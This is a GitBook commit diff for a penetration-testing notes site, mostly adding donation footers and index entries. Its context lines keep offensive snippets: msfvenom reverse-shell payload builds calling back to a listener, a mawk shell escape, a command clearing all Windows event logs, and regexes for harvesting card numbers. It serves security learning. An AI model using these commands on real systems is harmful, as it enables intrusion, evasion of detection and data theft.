GitBook: [master] 38 pages modified

Author: zweilosec

README.md

@@ -36,10 +36,12 @@ Always ensure you have **explicit** permission to access any computer system **b
 
 * [Linux Basics](linux-1/linux-basics.md)
 * [Hardening & Configuration Guide ](linux-1/linux-hardening/)
+  * [TMUX/Screen Cheatsheet](linux-1/linux-hardening/tmux-screen-cheatsheet.md)
 * [Red Team Notes](linux-1/linux-redteam/)
   * [Enumeration](linux-1/linux-redteam/enumeration.md)
   * [Getting Access](linux-1/linux-redteam/getting-access.md)
   * [Privilege Escalation](linux-1/linux-redteam/privilege-escalation.md)
+  * [Exfiltration](linux-1/linux-redteam/exfiltration.md)
   * [Persistence](linux-1/linux-redteam/persistance.md)
 * [Vim](linux-1/vim.md)
 
@@ -68,7 +70,9 @@ Always ensure you have **explicit** permission to access any computer system **b
 ## Web
 
 * [DNS](web/dns.md)
+* [Subdomain/Virtual Host Enumeration](web/subdomain-virtual-host-enumeration.md)
 * [Web Apps](web/web-notes/)
+  * [Web Application Hacker's Handbook Task Checklist](web/web-notes/the-web-application-hackers-handbook.md)
 
 ## Mobile
 
@@ -82,8 +86,13 @@ Always ensure you have **explicit** permission to access any computer system **b
 * [OS Agnostic](os-agnostic/os_agnostic.md)
 * [OSINT](os-agnostic/osint.md)
 * [Password Cracking](os-agnostic/password-cracking/)
+  * [Gathering the Hashes](os-agnostic/password-cracking/gathering-the-hashes.md)
+  * [Wordlist Generation](os-agnostic/password-cracking/wordlist-manipulation.md)
+  * [Cracking the Hashes](os-agnostic/password-cracking/cracking-the-hashes.md)
 * [Reverse Engineering & Binary Exploitation](os-agnostic/reverse-engineering-and-binary-exploitation/)
+  * [Buffer Overflow](os-agnostic/reverse-engineering-and-binary-exploitation/buffer-overflow.md)
 * [Scripting](os-agnostic/scripting/)
+  * [Scripting Language Syntax Comparison](os-agnostic/scripting/script-language-comparison.md)
 * [SQL](os-agnostic/sql.md)
 * [SSH & SCP](os-agnostic/ssh-and-scp.md)
 * [Steganography](os-agnostic/steganography.md)
@@ -93,11 +102,11 @@ Always ensure you have **explicit** permission to access any computer system **b
 
 * [Unsorted Notes](untitled.md)
 
-## CTF Tools and Cheatsheets 
+## OSCP/CTF Tools and Cheatsheets 
 
 [List of outside sources](tools-cheatsheets.md)
 
 
 
-If you like this content and would like to see more, please consider supporting me through Patreon at [https://www.patreon.com/zweilosec](https://www.patreon.com/zweilosec).
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
 

hacking-methodology.md

@@ -44,3 +44,5 @@ Proper and thorough enumeration is the key to a successful engagement. Privilege
 * Adapting - Customize the exploit so it fits. Not every exploit works for every system "out of the box".
 * Trying - Get ready for \(lots of\) trial and error.
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

hands-on-practice.md

@@ -73,3 +73,5 @@ Other compilations:
 
 * [https://razvioverflow.github.io/starthacking](https://razvioverflow.github.io/starthacking)  Razvioverflow
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

linux-1/linux-basics.md

@@ -480,3 +480,5 @@ sudo chmod ugo+r /var/lib/command-not-found/commands.db* #fix database permissio
 * [https://explainshell.com/](https://explainshell.com/)
 * [https://unix.stackexchange.com/questions/26047/how-to-correctly-add-a-path-to-path](https://unix.stackexchange.com/questions/26047/how-to-correctly-add-a-path-to-path)
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

linux-1/linux-hardening/README.md

@@ -377,3 +377,5 @@ echo '1' > /proc/sys/net/ipv4/ip_forward
 * [https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/](https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/)
 * [https://www.thegeekdiary.com/what-is-the-purpose-of-utmp-wtmp-and-btmp-files-in-linux/](https://www.thegeekdiary.com/what-is-the-purpose-of-utmp-wtmp-and-btmp-files-in-linux/)
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

linux-1/linux-hardening/tmux-screen-cheatsheet.md

@@ -324,3 +324,5 @@ Kill pane: `prefix + &`
 * tmux logging plugin \(get this!!\) can save log of tmux windows
 * [better mouse mode](https://github.com/NHDaly/tmux-better-mouse-mode)
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

linux-1/linux-redteam/README.md

@@ -64,3 +64,7 @@ pretty print JSON text in console \([https://www.howtogeek.com/529219/how-to-par
 
 `vi -c 'let $enc = &fileencoding | execute "!echo Encoding: $enc" | q' <file_to_check>` check encoding of a text file \(needed especially when doing crypto with python, or cracking passwords with `rockyou.txt` - _hint: needs latin encoding!_\) [https://vim.fandom.com/wiki/Bash\_file\_encoding\_alias](https://vim.fandom.com/wiki/Bash_file_encoding_alias) \(how to make an alias for the above command\)
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

linux-1/linux-redteam/enumeration.md

@@ -621,3 +621,5 @@ find / -name ftp
 * [https://securityreason.com](https://securityreason.com)
 * [https://seclists.org/fulldisclosure/](https://seclists.org/fulldisclosure/)
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

linux-1/linux-redteam/exfiltration.md

@@ -133,3 +133,5 @@ if __name__ == '__main__':
     main()
 ```
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

linux-1/linux-redteam/getting-access.md

@@ -329,3 +329,5 @@ xhost +targetip
 * [https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html](https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html)
 * [https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

linux-1/linux-redteam/persistance.md

@@ -24,3 +24,5 @@ Add script to run at startup: `update-rc.d </path/to/the/script> defaults` \(nee
   * `$comment` is usually the user's Full Name.  Check the `/etc/passwd` file to ensure you match local standards.
   * \(assumes you have write privilege to this file!\). 
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

linux-1/linux-redteam/privilege-escalation.md

@@ -359,3 +359,5 @@ mawk 'BEGIN {system("/bin/sh")}'
 * [https://touhidshaikh.com/blog/2018/04/sudo-ld\_preload-linux-privilege-escalation/](https://touhidshaikh.com/blog/2018/04/sudo-ld_preload-linux-privilege-escalation/)
 * [https://www.baeldung.com/linux/ld\_preload-trick-what-is](https://www.baeldung.com/linux/ld_preload-trick-what-is)
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

linux-1/vim.md

@@ -29,5 +29,5 @@ Enter insert \(normal text edit\) mode: `i` _\(yep that's it, just type and move
 * [https://www.youtube.com/watch?v=OnUiHLYZgaA](https://www.youtube.com/watch?v=OnUiHLYZgaA)
 * vim plugins: fuzzy finder plugin ctrlp /// surround.vim
 
-\_\_
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
 

os-agnostic/cryptography-and-encryption.md

@@ -125,3 +125,7 @@ public class Program
 
 Decodes to: `w3lc0meFr31nd`
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

os-agnostic/network-hardware.md

@@ -6,15 +6,19 @@ Hack Responsibly.
 Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents.  You accept full responsibility for your actions by applying any knowledge gained here.  
 {% endhint %}
 
+Not much here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
+
 [https://www.bettercap.org/](https://www.bettercap.org/)
 
 [https://miloserdov.org/?p=1112\#1](https://miloserdov.org/?p=1112#1)
 
-Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
-
 ## Default credentials/configurations
 
 [https://www.routerdefaults.org/](https://www.routerdefaults.org/)
 
-[https://www.routerpasswords.com/](https://www.routerpasswords.com/)
+{% embed url="https://www.routerpasswords.com/" %}
+
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
 

os-agnostic/osint.md

@@ -187,3 +187,7 @@ Not all of these sites below are trustworthy.  Do not enter any credentials that
 * https://intelx.io
 * https://leakprobe.net
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

os-agnostic/password-cracking/README.md

@@ -77,3 +77,7 @@ Example: `1:2:a1%.` The generated passwords will be of length 1 to 2 and contain
 * [https://guide.offsecnewbie.com/password-cracking](https://guide.offsecnewbie.com/password-cracking)
 * [https://www.hackingarticles.in/abusing-kerberos-using-impacket/](https://www.hackingarticles.in/abusing-kerberos-using-impacket/)
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

os-agnostic/password-cracking/cracking-the-hashes.md

@@ -343,3 +343,7 @@ public class Program
 
 Decodes to: `w3lc0meFr31nd`
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

os-agnostic/password-cracking/gathering-the-hashes.md

@@ -160,3 +160,7 @@ AMEX `# grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt`
 
 `# egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt`
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

os-agnostic/password-cracking/wordlist-manipulation.md

@@ -113,7 +113,7 @@ tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n2
 
 `# unix2dos file.txt`
 
-### Remove from one file what is in another file
+### Extract the difference between two files
 
 `# grep -F -v -f file1.txt -w file2.txt > file3.txt`
 
@@ -129,3 +129,7 @@ tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n2
 
 `# awk '{ print NR, $0 }' file.txt | grep "string-to-grep"`
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

os-agnostic/reverse-engineering-and-binary-exploitation/README.md

@@ -6,7 +6,7 @@ Hack Responsibly.
 Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents.  You accept full responsibility for your actions by applying any knowledge gained here.  
 {% endhint %}
 
-## Binary Exploitation / Reverse Engineering
+Not much here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
 
 [Ghidra](https://ghidra-sre.org/)!
 
@@ -33,3 +33,7 @@ simple binary exploitation [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/
 
 Find the location of a specific string to manipulate and its bit offset in an executable:`strings -t d <file> | grep <string to locate in ELF>`
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

os-agnostic/reverse-engineering-and-binary-exploitation/buffer-overflow.md

@@ -1,7 +1,13 @@
 # Buffer Overflow
 
+Not much here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
+
+
+
 Buffer Overflow-specific resources:
 
 * [https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/](https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/)
 * [https://github.com/justinsteven/dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

os-agnostic/scripting/README.md

@@ -270,3 +270,5 @@ _With Finfo\(\)_
 new Finfo(0,glob(hex2bin(hex2bin(3261)))[0]);
 ```
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

os-agnostic/scripting/script-language-comparison.md

@@ -1971,3 +1971,5 @@ References
 * [https://wiki.bash-hackers.org/syntax/expansion/cmdsubst](https://wiki.bash-hackers.org/syntax/expansion/cmdsubst)
 * [https://www.tutorialspoint.com/batch\_script/batch\_script\_syntax.htm](https://www.tutorialspoint.com/batch_script/batch_script_syntax.htm)
 * 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

tools-cheatsheets.md

@@ -51,3 +51,7 @@ Always ensure you have **explicit** permission to access any computer system **b
 
 [https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

web/dns.md

@@ -295,3 +295,7 @@ dnsrecon -d zonetransfer.me -t axfr
 dnsenum zonetransfer.me
 ```
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

web/subdomain-virtual-host-enumeration.md

@@ -1,5 +1,11 @@
 # Subdomain/Virtual Host Enumeration
 
+{% hint style="success" %}
+Hack Responsibly.
+
+Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents.  You accept full responsibility for your actions by applying any knowledge gained here.  
+{% endhint %}
+
 ## Wordlists
 
 * [https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS)
@@ -227,3 +233,7 @@ nmap $ip -oX scan
 cat scan.xml | aquatone -nmap
 ```
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

web/web-notes/README.md

@@ -263,15 +263,21 @@ nikto -useproxy http://$ip:3128 -h $ip
 
 ## OpenVAS Vulnerability Scanner
 
-```text
-apt-get update
-
-apt-get install openvas
+```bash
+#Install openvas
+apt update
+apt install openvas
 
+#Run the setup script
 openvas-setup
 
+#Check that it is running on port 939
 netstat -tulpn
 
-Login at: https://$ip:939
+#Login by using a browser to navigate to: https://127.0.0.1:939
 ```
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

web/web-notes/the-web-application-hackers-handbook.md

@@ -104,3 +104,7 @@ Based off of the original _Web Application Hacker's Handbook_, this project was
 * [https://portswigger.net/web-security](https://portswigger.net/web-security)
 * [https://gist.github.com/jhaddix/6b777fb004768b388fefadf9175982ab](https://gist.github.com/jhaddix/6b777fb004768b388fefadf9175982ab)
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

windows-1/powershell.md

@@ -704,3 +704,7 @@ PowerShell reverse shell and exploit scripts: `nishang` To learn how to use this
   * [https://0xdarkvortex.dev/index.php/2019/01/01/active-directory-penetration-dojo-ad-environment-enumeration-1/](https://0xdarkvortex.dev/index.php/2019/01/01/active-directory-penetration-dojo-ad-environment-enumeration-1/) - site down?
   * [https://activedirectorypro.com/powershell-commands/](https://activedirectorypro.com/powershell-commands/) 
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

windows-1/windows-basics.md

@@ -306,3 +306,5 @@ To remove a previously mounted share: `"net use z: /delete"`
 
 PowerShell is a large and important enough topic that it has its [own page](powershell.md).
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

windows-1/windows-hardening.md

@@ -21,9 +21,12 @@ disable location, telemetry, etc
 
 {% embed url="https://ninite.com" %}
 
-notepad++
+* [notepad++](https://notepad-plus-plus.org/)
+* [Visual Studio Code](https://code.visualstudio.com/)
+* [Tor Browser](https://www.torproject.org/)
+  * Based on Firefox.  Be careful of settings and extensions used as these can break the protection provided by the VPN.  
 
-Visual Studio Code
 
-Tor Browser - based on Firefox.  Be careful of settings and extensions used as these can break the protection provided by the VPN.  
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
 

windows-1/windows-redteam/README.md

@@ -54,3 +54,7 @@ check what updates are installed: `type WindowsUpdate.log`
 
 net use share from linux \[like SimpleHTTPServer for Samba\]: `impacket-smbserver <sharename> '<dir_to_share>'`
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

windows-1/windows-redteam/active-directory.md

@@ -1363,3 +1363,5 @@ Backup-Gpo -All -Path E:GPObackup
 
 
 
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

windows-1/windows-redteam/enumeration.md

@@ -1506,3 +1506,7 @@ done
 * [https://sysnetdevops.com/2017/04/24/exploring-the-powershell-alternative-to-netstat/](https://sysnetdevops.com/2017/04/24/exploring-the-powershell-alternative-to-netstat/)
 * [https://techexpert.tips/powershell/powershell-list-open-udp-ports/](https://techexpert.tips/powershell/powershell-list-open-udp-ports/)
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+

windows-1/windows-redteam/getting-access.md

@@ -6,6 +6,8 @@ Hack Responsibly.
 Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents.  You accept full responsibility for your actions by applying any knowledge gained here.  
 {% endhint %}
 
+Not much here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
+
 ## **Reverse Shells**
 
 TODO: description and methodology for each section \(as needed\); Fix code examples so they can be used for scripting
@@ -50,5 +52,7 @@ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > reve
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > reversetcp.exe
 ```
 
-Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
 

windows-1/windows-redteam/persistence.md

@@ -579,3 +579,7 @@ for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
 * [https://www.tenforums.com/tutorials/16588-clear-all-event-logs-event-viewer-windows.html](https://www.tenforums.com/tutorials/16588-clear-all-event-logs-event-viewer-windows.html) - [Shawn Brink](https://www.tenforums.com/members/brink.html?s=c4719816f0e7a9450a073c5aeafb6024)
 * [https://techibee.com/powershell/use-wmi-powershell-to-enable-or-disable-rdp-on-windows-server/3071](https://techibee.com/powershell/use-wmi-powershell-to-enable-or-disable-rdp-on-windows-server/3071)
 
+
+
+If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
+